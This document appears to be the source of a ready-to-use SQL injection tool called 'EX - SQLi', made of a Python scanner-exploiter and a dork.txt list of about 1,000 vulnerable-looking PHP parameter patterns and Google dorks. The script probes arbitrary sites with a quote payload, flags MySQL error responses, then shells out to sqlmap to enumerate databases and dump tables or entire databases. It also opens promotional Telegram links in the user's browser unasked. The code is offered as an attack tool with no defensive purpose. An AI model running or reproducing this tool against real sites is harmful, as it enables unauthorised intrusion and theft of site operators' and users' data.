asyncio 4 | import re 5 | import platform 6 | import webbrowser 7 | from pyfiglet import Figlet 8 | import subprocess 9 | import sys 10 | 11 | GREEN = "\033[92m" 12 | RED = "\033[91m" 13 | YELLOW = "\033[93m" 14 | CYAN = "\033[96m" 15 | RESET = "\033[0m" 16 | 17 | uname = [] 18 | payload = "'" 19 | num_id = range(1, 100) 20 | 21 | def load_dorks(filename="dork.txt"): 22 | try: 23 | with open(filename, 'r', encoding='utf-8') as file: 24 | return file.read().splitlines() 25 | except FileNotFoundError: 26 | print(f"File {filename} not found.") 27 | return [] 28 | 29 | page = load_dorks() 30 | 31 | def check_site(site): 32 | if not site.startswith("http"): 33 | site = f"http://{site}" 34 | return site 35 | 36 | async def scan_page(session, site, pg, ids): 37 | site_sql = f"{site}/{pg}{ids}{payload}" 38 | try: 39 | async with session.get(site_sql) as response: 40 | sqli_injection = f"{site}/{pg}{ids}" 41 | source_code = await response.text() 42 | if re.search(r'You have an error in your SQL syntax;', source_code): 43 | status = f"-| \033[1;32mSQL INJECTION : {sqli_injection}" 44 | sys.stdout.write("\r" + status) 45 | sys.stdout.flush() 46 | with open('sites_sql.txt', 'a', encoding='utf-8') as site_file: 47 | site_file.write(f"{sqli_injection}\n") 48 | exploits = input(f"\n{RESET}#{RED} Do you want to exploit it now? :{RESET} ") 49 | if exploits =='yes' or exploits =='Yes' or exploits =='Y' or exploits =='y': 50 | asyncio.run(exploit(sqli_injection)) 51 | else: 52 | pass 53 | 54 | else: 55 | status = f"{RESET}-| {GREEN} Scanning :{RESET} {site} {RED}~ {RESET}[ {GREEN}ID: {ids} ~ {page.index(pg) + 1}/{len(page)}{RESET} ]" 56 | sys.stdout.write("\r" + status) 57 | sys.stdout.flush() 58 | except Exception as e: 59 | pass 60 | 61 | async def scanning(site): 62 | site = check_site(site) 63 | async with aiohttp.ClientSession() as session: 64 | tasks = [] 65 | for pg in page: 66 | for ids in num_id: 67 | task = asyncio.create_task(scan_page(session, site, pg, ids)) 68 | tasks.append(task) 69 | await asyncio.gather(*tasks) 70 | 71 | def exploit(site): 72 | site = check_site(site) 73 | for pg in page: 74 | for ids in num_id: 75 | sqlmap_cmd = f"sqlmap -u {site}/{pg}{ids} --dbs --batch" 76 | subprocess.run(sqlmap_cmd, shell=True) 77 | db = input("\033[90m╔═══[Enter Database Name ]\n╚══>>> \033[32m") 78 | sqlmap_cmd = f"sqlmap -u {site}/{pg}{ids} -D {db} --tables" 79 | subprocess.run(sqlmap_cmd, shell=True) 80 | table = input("\033[90m╔═══[Enter Table Name ]\n╚══>>> \033[32m") 81 | sqlmap_cmd = f"sqlmap -u {site}/{pg}{ids} -D {db} -T {table} --columns" 82 | subprocess.run(sqlmap_cmd, shell=True) 83 | dn = input("\033[1;31mDo you want to load the table or slot to load the table, type [d]: ") 84 | if dn.lower() == "d": 85 | col = input("\033[1;31m[+] Write to me the name of the column you want to download: ") 86 | sqlmap_cmd = f"sqlmap -u {site}/{pg}{ids} -D {db} -T {table} -C {col} --dump" 87 | subprocess.run(sqlmap_cmd, shell=True) 88 | else: 89 | d_all = input("\033[1;31mDo you want to download the entire database [y/n]: ") 90 | if d_all.lower() == "y": 91 | sqlmap_cmd = f"sqlmap -u {site}/{pg}{ids} -D {db} --dump" 92 | subprocess.run(sqlmap_cmd, shell=True) 93 | 94 | def main(): 95 | try: 96 | username = os.getlogin() 97 | if username not in uname: 98 | webbrowser.open('https://t.me/TYG_YE') 99 | uname.append(username) 100 | if platform.system() == "Linux": 101 | os.system('clear') 102 | else: 103 | os.system('cls') 104 | 105 | f = Figlet(font='slant') 106 | print(RED + f.renderText('EX - SQLi')) 107 | print(RESET+ " Coded By inst: cyber_77k\n\n") 108 | print(f""" 109 | 110 | {RED}[{RESET}1{RED}] {GREEN}EXPLOIT SQLI {RED}[{RESET}2{RED}] {GREEN} SCANNING SQLi 111 | {RED}[{RESET}3{RED}] {GREEN}ABOUT DEVELOPER {RED}[{RESET}4{RED}] {GREEN} ABOUT SOFTWARE 112 | """) 113 | sqli = input(f"\n{RED}╔═══{GREEN}[ {RESET}root{GREEN}@{RESET}Ex-SQLi ~ V0.1 {GREEN}] \n{RED}╚══>>> \033[32m") 114 | 115 | if sqli == '1': 116 | site = input(f"\n{RED}╔═══{GREEN}[ {RESET}ENTER URL{GREEN}] \n{RED}╚══>>> \033[32m") 117 | exploit(site) 118 | elif sqli == '2': 119 | site = input(f"\n{RED}╔═══{GREEN}[ {RESET}ENTER URL{GREEN}] \n{RED}╚══>>> \033[32m") 120 | asyncio.run(scanning(site)) 121 | elif sqli == '3': 122 | asyncio.run(about_developer()) 123 | elif sqli == '4': 124 | asyncio.run(about_software()) 125 | except Exception as s: 126 | print(f"Error: {s}") 127 | 128 | 129 | 130 | def about_developer(): 131 | print(f""" 132 | {CYAN}About The Developer{RESET} 133 | {YELLOW}------------------{RESET} 134 | {GREEN}Name:{RESET} Mr.SaMi From Yemen 135 | {GREEN}Telegram:{RESET} https://t.me/SaMi_ye 136 | {GREEN}GitHub:{RESET} https://github.com/0.d3y 137 | {GREEN}Website:{RESET} https://sami-soft-ye.blogspot.com 138 | {YELLOW}------------------{RESET} 139 | """) 140 | input(f"{RED}-| {RESET}Press Enter to return ~{RED}# {GREEN}") 141 | main() 142 | 143 | 144 | def about_software(): 145 | print(f""" 146 | {CYAN}About the Software{RESET} 147 | {YELLOW}------------------{RESET} 148 | {GREEN}Name:{RESET} EX - SQLi 149 | {GREEN}Version:{RESET} 1.0 150 | {GREEN}Features:{RESET} 151 | - Fast and efficient SQL Injection scanning 152 | - Supports batch processing of multiple URLs 153 | - High accuracy with detection of common SQL error patterns 154 | - User-friendly interface with detailed logging 155 | 156 | {GREEN}Speed:{RESET} Optimized for high performance with asynchronous requests 157 | {GREEN}Accuracy:{RESET} High accuracy in detecting SQL Injection vulnerabilities using common error patterns 158 | {YELLOW}------------------{RESET} 159 | """) 160 | input(f"{RED}-| {RESET}Press Enter to return ~{RED}# {GREEN}") 161 | main() 162 | 163 | def login(): 164 | try: 165 | with open("ch.txt", 'r', encoding='utf-8') as file: 166 | sami_ch = file.read().splitlines() 167 | if 'ok' in sami_ch: 168 | username = os.getlogin() 169 | uname.append(username) 170 | main() 171 | except FileNotFoundError: 172 | with open('ch.txt', 'w', encoding='utf-8') as file: 173 | file.write('ok') 174 | webbrowser.open('https://t.me/i_0d3y') 175 | username = os.getlogin() 176 | uname.append(username) 177 | main() 178 | 179 | login() 180 | -------------------------------------------------------------------------------- /Ex-SQLi-Linux/dork.txt: -------------------------------------------------------------------------------- 1 | single-post.php?id= 2 | en/product.php?id= 3 | trainers.php?id= 4 | play_old.php?id= 5 | declaration_more.php?decl_id= 6 | Pageid= 7 | games.php?id= 8 | newsDetail.php?id= 9 | staff_id= 10 | historialeer.php?num= 11 | product-item.php?id= 12 | news_view.php?id= 13 | humor.php?id= 14 | communique_detail.php?id= 15 | sem.php3?id= 16 | opinions.php?id= 17 | spr.php?id= 18 | pages.php?id= 19 | chappies.php?id= 20 | prod_detail.php?id= 21 | viewphoto.php?id= 22 | view.php?id= 23 | website.php?id= 24 | hosting_info.php?id= 25 | gery.php?id= 26 | detail.php?ID= 27 | publications.php?id= 28 | Productinfo.php?id= 29 | releases.php?id= 30 | ray.php?id= 31 | produit.php?id= 32 | pop.php?id= 33 | shopping.php?id= 34 | productdetail.php?id= 35 | post.php?id= 36 | section.php?id= 37 | theme.php?id= 38 | page.php?id= 39 | shredder-categories.php?id= 40 | product_ranges_view.php?ID= 41 | shop_category.php?id= 42 | channel_id= 43 | newsid= 44 | news_display.php?getid= 45 | ages.php?id= 46 | clanek.php4?id= 47 | review.php?id= 48 | iniziativa.php?in= 49 | curriculum.php?id= 50 | labels.php?id= 51 | look.php?ID= 52 | galeri_info.php?l= 53 | tekst.php?idt= 54 | newscat.php?id= 55 | newsticker_info.php?idn= 56 | rubrika.php?idr= 57 | offer.php?idf= 58 | index.php?id= 59 | buy.php?category= 60 | article.php?ID= 61 | play_old.php?id= 62 | newsitem.php?num= 63 | top10.php?cat= 64 | historialeer.php?num= 65 | reagir.php?num= 66 | Stray-Questions-View.php?num= 67 | forum_bds.php?num= 68 | game.php?id= 69 | view_product.php?id= 70 | sw_comment.php?id= 71 | news.php?id= 72 | avd_start.php?avd= 73 | event.php?id= 74 | sql.php?id= 75 | news_view.php?id= 76 | select_biblio.php?id= 77 | humor.php?id= 78 | ogl_inet.php?ogl_id= 79 | fiche_spectacle.php?id= 80 | communique_detail.php?id= 81 | sem.php3?id= 82 | kategorie.php4?id= 83 | faq2.php?id= 84 | show_an.php?id= 85 | preview.php?id= 86 | loadpsb.php?id= 87 | opinions.php?id= 88 | spr.php?id= 89 | announce.php?id= 90 | participant.php?id= 91 | download.php?id= 92 | main.php?id= 93 | review.php?id= 94 | chappies.php?id= 95 | read.php?id= 96 | prod_detail.php?id= 97 | article.php?id= 98 | person.php?id= 99 | productinfo.php?id= 100 | showimg.php?id= 101 | view.php?id= 102 | website.php?id= 103 | hosting_info.php?id= 104 | gery.php?id= 105 | rub.php?idr= 106 | view_faq.php?id= 107 | artikelinfo.php?id= 108 | detail.php?ID= 109 | index.php?= 110 | profile_view.php?id= 111 | category.php?id= 112 | publications.php?id= 113 | fellows.php?id= 114 | downloads_info.php?id= 115 | prod_info.php?id= 116 | shop.php?do=part&id= 117 | collectionitem.php?id= 118 | band_info.php?id= 119 | product.php?id= 120 | releases.php?id= 121 | ray.php?id= 122 | produit.php?id= 123 | pop.php?id= 124 | shopping.php?id= 125 | productdetail.php?id= 126 | post.php?id= 127 | viewshowdetail.php?id= 128 | clubpage.php?id= 129 | memberInfo.php?id= 130 | section.php?id= 131 | theme.php?id= 132 | page.php?id= 133 | shredder-categories.php?id= 134 | tradeCategory.php?id= 135 | product_ranges_view.php?ID= 136 | shop_category.php?id= 137 | transcript.php?id= 138 | channel_id= 139 | item_id= 140 | newsid= 141 | trainers.php?id= 142 | news-full.php?id= 143 | news_display.php?getid= 144 | index2.php?option= 145 | readnews.php?id= 146 | newsone.php?id= 147 | product-item.php?id= 148 | pages.php?id= 149 | clanek.php4?id= 150 | viewapp.php?id= 151 | viewphoto.php?id= 152 | galeri_info.php?l= 153 | iniziativa.php?in= 154 | curriculum.php?id= 155 | labels.php?id= 156 | story.php?id= 157 | look.php?ID= 158 | aboutbook.php?id= 159 | “id=” & intext:”Warning: mysql_fetch_assoc() 160 | “id=” & intext:”Warning: is_writable() 161 | “id=” & intext:”Warning: Unknown() 162 | “id=” & intext:”Warning: mysql_result() 163 | “id=” & intext:”Warning: pg_exec() 164 | “id=” & intext:”Warning: require() 165 | buy.php?category= 166 | pageid= 167 | page.php?file= 168 | show.php?id= 169 | newsitem.php?num= 170 | readnews.php?id= 171 | top10.php?cat= 172 | reagir.php?num= 173 | Stray-Questions-View.php?num= 174 | forum_bds.php?num= 175 | game.php?id= 176 | view_product.php?id= 177 | sw_comment.php?id= 178 | news.php?id= 179 | avd_start.php?avd= 180 | event.php?id= 181 | sql.php?id= 182 | select_biblio.php?id= 183 | ogl_inet.php?ogl_id= 184 | fiche_spectacle.php?id= 185 | kategorie.php4?id= 186 | faq2.php?id= 187 | show_an.php?id= 188 | loadpsb.php?id= 189 | announce.php?id= 190 | participant.php?id= 191 | download.php?id= 192 | article.php?id= 193 | person.php?id= 194 | productinfo.php?id= 195 | showimg.php?id= 196 | rub.php?idr= 197 | view_faq.php?id= 198 | artikelinfo.php?id= 199 | index.php?= 200 | profile_view.php?id= 201 | category.php?id= 202 | fellows.php?id= 203 | downloads_info.php?id= 204 | prod_info.php?id= 205 | shop.php?do=part&id= 206 | collectionitem.php?id= 207 | band_info.php?id= 208 | product.php?id= 209 | viewshowdetail.php?id= 210 | clubpage.php?id= 211 | memberInfo.php?id= 212 | tradeCategory.php?id= 213 | transcript.php?id= 214 | item_id= 215 | news-full.php?id= 216 | aboutbook.php?id= 217 | preview.php?id= 218 | material.php?id= 219 | read.php?id= 220 | viewapp.php?id= 221 | story.php?id= 222 | newsone.php?id= 223 | rubp.php?idr= 224 | art.php?idm= 225 | title.php?id= 226 | index1.php?modo= 227 | include.php?[]= 228 | nota.php?pollname= 229 | index3.php?p= 230 | padrao.php?pre= 231 | home.php?pa= 232 | main.php?type= 233 | sitio.php?start= 234 | .php?include= 235 | general.php?xlink= 236 | show.php?go= 237 | nota.php?ki= 238 | down.php?oldal= 239 | layout.php?disp= 240 | enter.php?chapter= 241 | base.php?incl= 242 | enter.php?mod= 243 | show.php?corpo= 244 | head.php?[]= 245 | info.php?strona= 246 | template.php?str= 247 | main.php?doshow= 248 | view.php?[]= 249 | index.php?to= 250 | page.php?cmd= 251 | view.php?b= 252 | info.php?option= 253 | show.php?x= 254 | template.php?texto= 255 | index3.php?ir= 256 | print.php?chapter= 257 | file.php?inc= 258 | file.php?cont= 259 | view.php?cmd= 260 | include.php?chapter= 261 | path.php?my= 262 | principal.php?param= 263 | general.php?menue= 264 | index1.php?b= 265 | info.php?chapter= 266 | nota.php?chapter= 267 | general.php?include= 268 | start.php?addr= 269 | index1.php?qry= 270 | index1.php?loc= 271 | page.php?addr= 272 | index1.php?dir= 273 | principal.php?pr= 274 | press.php?seite= 275 | head.php?cmd= 276 | home.php?sec= 277 | home.php?category= 278 | standard.php?cmd= 279 | mod.php?thispage= 280 | base.php?to= 281 | view.php?choix= 282 | base.php?panel= 283 | template.php?mod= 284 | info.php?j= 285 | blank.php?pref= 286 | sub.php?channel= 287 | standard.php?in= 288 | general.php?cmd= 289 | pagina.php?panel= 290 | template.php?where= 291 | path.php?channel= 292 | gery.php?seccion= 293 | page.php?tipo= 294 | sitio.php?rub= 295 | pagina.php?u= 296 | file.php?ir= 297 | inc.php?sivu= 298 | path.php?start= 299 | page.php?chapter= 300 | home.php?recipe= 301 | enter.php?pname= 302 | layout.php?path= 303 | print.php?open= 304 | mod.php?channel= 305 | down.php?phpbb_root_path= 306 | inc.php?str= 307 | gery.php?phpbb_root_path= 308 | include.php?middlePart= 309 | sub.php?destino= 310 | info.php?read= 311 | home.php?sp= 312 | main.php?strona= 313 | sitio.php?get= 314 | sitio.php?index= 315 | index3.php?option= 316 | enter.php?a= 317 | main.php?second= 318 | print.php?pname= 319 | blank.php?itemnav= 320 | blank.php?pagina= 321 | index1.php?d= 322 | down.php?where= 323 | inc.php?include= 324 | path.php?pre= 325 | home.php?loader= 326 | start.php?eval= 327 | index.php?disp= 328 | head.php?mod= 329 | sitio.php?section= 330 | nota.php?doshow= 331 | home.php?seite= 332 | home.php?a= 333 | page.php?url= 334 | pagina.php?left= 335 | layout.php?c= 336 | principal.php?goto= 337 | standard.php?base_dir= 338 | home.php?where= 339 | page.php?sivu= 340 | inc.php?adresa= 341 | padrao.php?str= 342 | include.php?my= 343 | show.php?home= 344 | index.php?load= 345 | index3.php?rub= 346 | sub.php?str= 347 | start.php?index= 348 | nota.php?mod= 349 | sub.php?mid= 350 | index1.php?[]= 351 | pagina.php?oldal= 352 | padrao.php?loc= 353 | padrao.php?rub= 354 | page.php?incl= 355 | gery.php?disp= 356 | nota.php?oldal= 357 | include.php?u= 358 | principal.php?pagina= 359 | print.php?choix= 360 | head.php?filepath= 361 | include.php?corpo= 362 | sub.php?action= 363 | head.php?pname= 364 | press.php?dir= 365 | show.php?xlink= 366 | file.php?left= 367 | nota.php?destino= 368 | general.php?module= 369 | index3.php?redirect= 370 | down.php?param= 371 | default.php?ki= 372 | padrao.php?h= 373 | padrao.php?read= 374 | mod.php?cont= 375 | index1.php?l= 376 | down.php?pr= 377 | gery.php?viewpage= 378 | template.php?load= 379 | nota.php?pr= 380 | padrao.php?destino= 381 | index2.php?channel= 382 | principal.php?opcion= 383 | start.php?str= 384 | press.php?[]= 385 | index.php?ev= 386 | pagina.php?pre= 387 | nota.php?content= 388 | include.php?adresa= 389 | sitio.php?t= 390 | index.php?sivu= 391 | principal.php?q= 392 | path.php?ev= 393 | print.php?module= 394 | index.php?loc= 395 | nota.php?basepath= 396 | padrao.php?tipo= 397 | index2.php?in= 398 | principal.php?eval= 399 | file.php?qry= 400 | info.php?t= 401 | enter.php?play= 402 | general.php?var= 403 | principal.php?s= 404 | standard.php?pagina= 405 | standard.php?subject= 406 | base.php?second= 407 | head.php?inc= 408 | pagina.php?basepath= 409 | main.php?pname= 410 | inc.php?modo= 411 | include.php?goto= 412 | file.php?pg= 413 | head.php?g= 414 | general.php?header= 415 | start.php?root= 416 | enter.php?pref= 417 | index3.php?open= 418 | start.php?module= 419 | main.php?load= 420 | enter.php?pg= 421 | padrao.php?redirect= 422 | pagina.php?my= 423 | gery.php?pre= 424 | enter.php?w= 425 | info.php?texto= 426 | enter.php?open= 427 | base.php?rub= 428 | gery.php?[]= 429 | include.php?cmd= 430 | standard.php?dir= 431 | layout.php?page= 432 | index3.php?pageweb= 433 | include.php?numero= 434 | path.php?destino= 435 | index3.php?home= 436 | default.php?seite= 437 | path.php?eval= 438 | base.php?choix= 439 | template.php?cont= 440 | info.php?pagina= 441 | default.php?x= 442 | default.php?option= 443 | gery.php?ki= 444 | down.php?second= 445 | blank.php?path= 446 | pagina.php?v= 447 | file.php?pollname= 448 | index3.php?var= 449 | layout.php?goto= 450 | pagina.php?incl= 451 | home.php?action= 452 | include.php?oldal= 453 | print.php?left= 454 | print.php?u= 455 | nota.php?v= 456 | home.php?str= 457 | press.php?panel= 458 | page.php?mod= 459 | default.php?param= 460 | down.php?texto= 461 | mod.php?dir= 462 | view.php?where= 463 | blank.php?subject= 464 | path.php?play= 465 | base.php?l= 466 | index2.php?rub= 467 | general.php?opcion= 468 | layout.php?xlink= 469 | padrao.php?name= 470 | pagina.php?nivel= 471 | default.php?oldal= 472 | template.php?k= 473 | main.php?chapter= 474 | layout.php?chapter= 475 | layout.php?incl= 476 | include.php?url= 477 | base.php?sivu= 478 | index.php?link= 479 | sub.php?cont= 480 | info.php?oldal= 481 | general.php?rub= 482 | default.php?str= 483 | head.php?ev= 484 | sub.php?path= 485 | view.php?page= 486 | main.php?j= 487 | index2.php?basepath= 488 | gery.php?qry= 489 | main.php?url= 490 | default.php?incl= 491 | show.php?redirect= 492 | index1.php?pre= 493 | general.php?base_dir= 494 | start.php?in= 495 | show.php?abre= 496 | index1.php?home= 497 | home.php?ev= 498 | index2.php?ki= 499 | base.php?pag= 500 | default.php?ir= 501 | general.php?qry= 502 | index2.php?home= 503 | press.php?nivel= 504 | enter.php?pr= 505 | blank.php?loader= 506 | start.php?cmd= 507 | padrao.php?d= 508 | sitio.php?recipe= 509 | principal.php?read= 510 | standard.php?showpage= 511 | main.php?pg= 512 | page.php?panel= 513 | press.php?addr= 514 | template.php?s= 515 | main.php?tipo= 516 | inc.php?ev= 517 | padrao.php?page= 518 | show.php?thispage= 519 | home.php?secao= 520 | main.php?start= 521 | enter.php?mid= 522 | press.php?id= 523 | main.php?inc= 524 | index3.php?cmd= 525 | index.php?pname= 526 | press.php?subject= 527 | include.php?sec= 528 | index3.php?xlink= 529 | general.php?texto= 530 | index3.php?go= 531 | index.php?cmd= 532 | index3.php?disp= 533 | index3.php?left= 534 | sub.php?middle= 535 | show.php?modo= 536 | index1.php?pagina= 537 | head.php?left= 538 | enter.php?phpbb_root_path= 539 | show.php?z= 540 | start.php?basepath= 541 | blank.php?strona= 542 | template.php?y= 543 | page.php?where= 544 | layout.php?category= 545 | index1.php?my= 546 | principal.php?phpbb_root_path= 547 | nota.php?channel= 548 | page.php?choix= 549 | start.php?xlink= 550 | home.php?k= 551 | standard.php?phpbb_root_path= 552 | principal.php?middlePart= 553 | mod.php?m= 554 | index.php?recipe= 555 | template.php?path= 556 | pagina.php?dir= 557 | sitio.php?abre= 558 | index1.php?recipe= 559 | blank.php?page= 560 | sub.php?category= 561 | inc.php?bOdy= 562 | enter.php?middle= 563 | home.php?path= 564 | down.php?pre= 565 | base.php?w= 566 | main.php?path= 567 | nota.php?ir= 568 | press.php?link= 569 | gery.php?pollname= 570 | down.php?open= 571 | down.php?pageweb= 572 | default.php?eval= 573 | view.php?showpage= 574 | show.php?get= 575 | sitio.php?tipo= 576 | layout.php?cont= 577 | default.php?destino= 578 | padrao.php?seccion= 579 | down.php?r= 580 | main.php?param= 581 | standard.php?e= 582 | down.php?in= 583 | nota.php?include= 584 | sitio.php?secao= 585 | print.php?my= 586 | general.php?abre= 587 | general.php?link= 588 | default.php?id= 589 | standard.php?panel= 590 | show.php?channel= 591 | enter.php?r= 592 | index3.php?phpbb_root_path= 593 | gery.php?where= 594 | head.php?middle= 595 | sub.php?load= 596 | gery.php?sp= 597 | show.php?chapter= 598 | sub.php?b= 599 | general.php?adresa= 600 | print.php?goto= 601 | sub.php?sp= 602 | template.php?doshow= 603 | padrao.php?base_dir= 604 | index2.php?my= 605 | include.php?w= 606 | start.php?op= 607 | main.php?section= 608 | view.php?header= 609 | layout.php?menue= 610 | head.php?y= 611 | sub.php?content= 612 | show.php?type= 613 | base.php?id= 614 | mod.php?qry= 615 | default.php?strona= 616 | sitio.php?chapter= 617 | gery.php?index= 618 | nota.php?h= 619 | page.php?oldal= 620 | enter.php?panel= 621 | blank.php?t= 622 | start.php?pollname= 623 | sub.php?module= 624 | enter.php?thispage= 625 | mod.php?index= 626 | sitio.php?r= 627 | sub.php?play= 628 | index2.php?doshow= 629 | index2.php?chapter= 630 | show.php?path= 631 | gery.php?to= 632 | info.php?base_dir= 633 | gery.php?abre= 634 | gery.php?pag= 635 | view.php?channel= 636 | default.php?mod= 637 | index.php?op= 638 | general.php?pre= 639 | padrao.php?type= 640 | template.php?pag= 641 | standard.php?pre= 642 | blank.php?ref= 643 | down.php?z= 644 | general.php?inc= 645 | home.php?read= 646 | pagina.php?section= 647 | default.php?basepath= 648 | index.php?pre= 649 | sitio.php?pageweb= 650 | base.php?seite= 651 | inc.php?j= 652 | index2.php?filepath= 653 | file.php?type= 654 | index1.php?oldal= 655 | index2.php?second= 656 | index3.php?sekce= 657 | info.php?filepath= 658 | base.php?opcion= 659 | path.php?category= 660 | index3.php?start= 661 | start.php?rub= 662 | inc.php?i= 663 | blank.php?pre= 664 | general.php?channel= 665 | index2.php?OpenPage= 666 | page.php?section= 667 | mod.php?middle= 668 | index1.php?goFile= 669 | blank.php?action= 670 | principal.php?loader= 671 | sub.php?op= 672 | main.php?addr= 673 | start.php?mid= 674 | gery.php?secao= 675 | pagina.php?tipo= 676 | index.php?w= 677 | head.php?where= 678 | principal.php?tipo= 679 | press.php?loader= 680 | gery.php?showpage= 681 | gery.php?go= 682 | enter.php?start= 683 | press.php?lang= 684 | general.php?p= 685 | index.php?sekce= 686 | index2.php?get= 687 | sitio.php?go= 688 | include.php?cont= 689 | sub.php?where= 690 | index3.php?index= 691 | path.php?recipe= 692 | info.php?loader= 693 | print.php?sp= 694 | page.php?phpbb_root_path= 695 | path.php?bOdy= 696 | principal.php?menue= 697 | print.php?cont= 698 | pagina.php?z= 699 | default.php?mid= 700 | blank.php?xlink= 701 | sub.php?oldal= 702 | general.php?b= 703 | include.php?left= 704 | print.php?sivu= 705 | press.php?OpenPage= 706 | default.php?cont= 707 | general.php?pollname= 708 | template.php?nivel= 709 | enter.php?page= 710 | file.php?middle= 711 | standard.php?str= 712 | gery.php?get= 713 | main.php?v= 714 | down.php?subject= 715 | enter.php?sivu= 716 | path.php?option= 717 | index.php?strona= 718 | index1.php?choix= 719 | index2.php?f= 720 | press.php?destino= 721 | pagina.php?channel= 722 | principal.php?b= 723 | home.php?include= 724 | head.php?numero= 725 | general.php?ref= 726 | main.php?dir= 727 | gery.php?cont= 728 | principal.php?type= 729 | file.php?param= 730 | default.php?secao= 731 | path.php?pageweb= 732 | info.php?r= 733 | base.php?phpbb_root_path= 734 | main.php?itemnav= 735 | view.php?pg= 736 | pagina.php?choix= 737 | default.php?itemnav= 738 | index2.php?cmd= 739 | layout.php?url= 740 | index.php?path= 741 | index1.php?second= 742 | start.php?modo= 743 | index1.php?get= 744 | index3.php?my= 745 | sub.php?left= 746 | print.php?inc= 747 | view.php?type= 748 | path.php?[]= 749 | base.php?adresa= 750 | index3.php?oldal= 751 | standard.php?bOdy= 752 | base.php?path= 753 | principal.php?strona= 754 | info.php?l= 755 | template.php?left= 756 | head.php?loc= 757 | page.php?ir= 758 | print.php?path= 759 | down.php?path= 760 | sitio.php?opcion= 761 | pagina.php?category= 762 | press.php?menu= 763 | index2.php?pref= 764 | sitio.php?incl= 765 | show.php?ki= 766 | index3.php?x= 767 | page.php?strona= 768 | inc.php?open= 769 | index3.php?secao= 770 | standard.php?[]= 771 | template.php?basepath= 772 | standard.php?goFile= 773 | index2.php?ir= 774 | file.php?modo= 775 | gery.php?itemnav= 776 | main.php?oldal= 777 | down.php?showpage= 778 | start.php?destino= 779 | blank.php?rub= 780 | path.php?ir= 781 | layout.php?var= 782 | index1.php?texto= 783 | start.php?pg= 784 | index1.php?showpage= 785 | info.php?go= 786 | path.php?load= 787 | index3.php?abre= 788 | blank.php?where= 789 | info.php?start= 790 | page.php?secao= 791 | nota.php?pag= 792 | nota.php?second= 793 | index2.php?to= 794 | standard.php?name= 795 | start.php?strona= 796 | mod.php?numero= 797 | press.php?home= 798 | info.php?z= 799 | mod.php?path= 800 | blank.php?base_dir= 801 | base.php?texto= 802 | nota.php?secc= 803 | index.php?tipo= 804 | index.php?goto= 805 | print.php?pag= 806 | view.php?secao= 807 | general.php?strona= 808 | show.php?my= 809 | page.php?e= 810 | padrao.php?index= 811 | gery.php?thispage= 812 | start.php?base_dir= 813 | default.php?tipo= 814 | gery.php?panel= 815 | standard.php?ev= 816 | standard.php?destino= 817 | general.php?middle= 818 | main.php?basepath= 819 | standard.php?q= 820 | index1.php?tipo= 821 | mod.php?choix= 822 | template.php?ir= 823 | show.php?adresa= 824 | general.php?mid= 825 | index3.php?adresa= 826 | pagina.php?sec= 827 | template.php?secao= 828 | home.php?w= 829 | general.php?content= 830 | sub.php?recipe= 831 | main.php?category= 832 | enter.php?viewpage= 833 | main.php?ir= 834 | show.php?pageweb= 835 | principal.php?ir= 836 | default.php?pageweb= 837 | index.php?oldal= 838 | head.php?d= 839 | gery.php?mid= 840 | index.php?type= 841 | standard.php?j= 842 | show.php?oldal= 843 | enter.php?link= 844 | enter.php?content= 845 | blank.php?filepath= 846 | standard.php?channel= 847 | base.php?[]= 848 | info.php?incl= 849 | down.php?include= 850 | press.php?modo= 851 | file.php?choix= 852 | press.php?type= 853 | blank.php?goto= 854 | index3.php?showpage= 855 | principal.php?subject= 856 | start.php?chapter= 857 | show.php?r= 858 | pagina.php?thispage= 859 | general.php?chapter= 860 | page.php?base_dir= 861 | page.php?qry= 862 | show.php?incl= 863 | page.php?[]= 864 | main.php?h= 865 | file.php?seccion= 866 | default.php?pre= 867 | principal.php?index= 868 | principal.php?inc= 869 | home.php?z= 870 | pagina.php?in= 871 | show.php?play= 872 | nota.php?subject= 873 | default.php?secc= 874 | default.php?loader= 875 | padrao.php?var= 876 | mod.php?b= 877 | default.php?showpage= 878 | press.php?channel= 879 | pagina.php?ev= 880 | sitio.php?name= 881 | page.php?option= 882 | press.php?mid= 883 | down.php?corpo= 884 | view.php?get= 885 | print.php?thispage= 886 | principal.php?home= 887 | show.php?param= 888 | standard.php?sivu= 889 | index3.php?panel= 890 | include.php?play= 891 | path.php?cmd= 892 | file.php?sp= 893 | template.php?section= 894 | view.php?str= 895 | blank.php?left= 896 | nota.php?lang= 897 | path.php?sivu= 898 | main.php?e= 899 | default.php?ref= 900 | start.php?seite= 901 | default.php?inc= 902 | print.php?disp= 903 | home.php?h= 904 | principal.php?loc= 905 | index3.php?sp= 906 | gery.php?var= 907 | sub.php?base_dir= 908 | path.php?middle= 909 | pagina.php?str= 910 | base.php?play= 911 | base.php?v= 912 | sitio.php?sivu= 913 | main.php?r= 914 | file.php?nivel= 915 | start.php?sivu= 916 | template.php?c= 917 | general.php?second= 918 | sub.php?mod= 919 | home.php?loc= 920 | head.php?corpo= 921 | standard.php?op= 922 | index2.php?inc= 923 | info.php?pref= 924 | base.php?basepath= 925 | print.php?basepath= 926 | inc.php?m= 927 | base.php?home= 928 | layout.php?strona= 929 | padrao.php?url= 930 | sitio.php?oldal= 931 | pagina.php?read= 932 | index1.php?go= 933 | standard.php?s= 934 | page.php?eval= 935 | index.php?j= 936 | pagina.php?pr= 937 | start.php?secao= 938 | template.php?[]= 939 | nota.php?get= 940 | index3.php?link= 941 | home.php?e= 942 | gery.php?name= 943 | nota.php?eval= 944 | sub.php?abre= 945 | index2.php?load= 946 | principal.php?in= 947 | view.php?load= 948 | mod.php?action= 949 | default.php?p= 950 | head.php?c= 951 | template.php?viewpage= 952 | view.php?mid= 953 | padrao.php?addr= 954 | view.php?go= 955 | file.php?basepath= 956 | home.php?pre= 957 | include.php?goFile= 958 | layout.php?play= 959 | index1.php?subject= 960 | info.php?middlePart= 961 | down.php?pg= 962 | sub.php?bOdy= 963 | index.php?option= 964 | sub.php?chapter= 965 | default.php?t= 966 | head.php?opcion= 967 | nota.php?panel= 968 | sitio.php?left= 969 | show.php?include= 970 | pagina.php?start= 971 | head.php?choix= 972 | index3.php?tipo= 973 | index3.php?choix= 974 | down.php?channel= 975 | base.php?pa= 976 | nota.php?sekce= 977 | show.php?l= 978 | show.php?index= 979 | blank.php?url= 980 | start.php?thispage= 981 | nota.php?play= 982 | show.php?second= 983 | enter.php?include= 984 | principal.php?middle= 985 | main.php?where= 986 | padrao.php?link= 987 | path.php?strona= 988 | index3.php?read= 989 | mod.php?module= 990 | standard.php?viewpage= 991 | standard.php?pr= 992 | inc.php?showpage= 993 | pagina.php?ref= 994 | path.php?pname= 995 | padrao.php?mid= 996 | info.php?eval= 997 | include.php?path= 998 | page.php?subject= 999 | 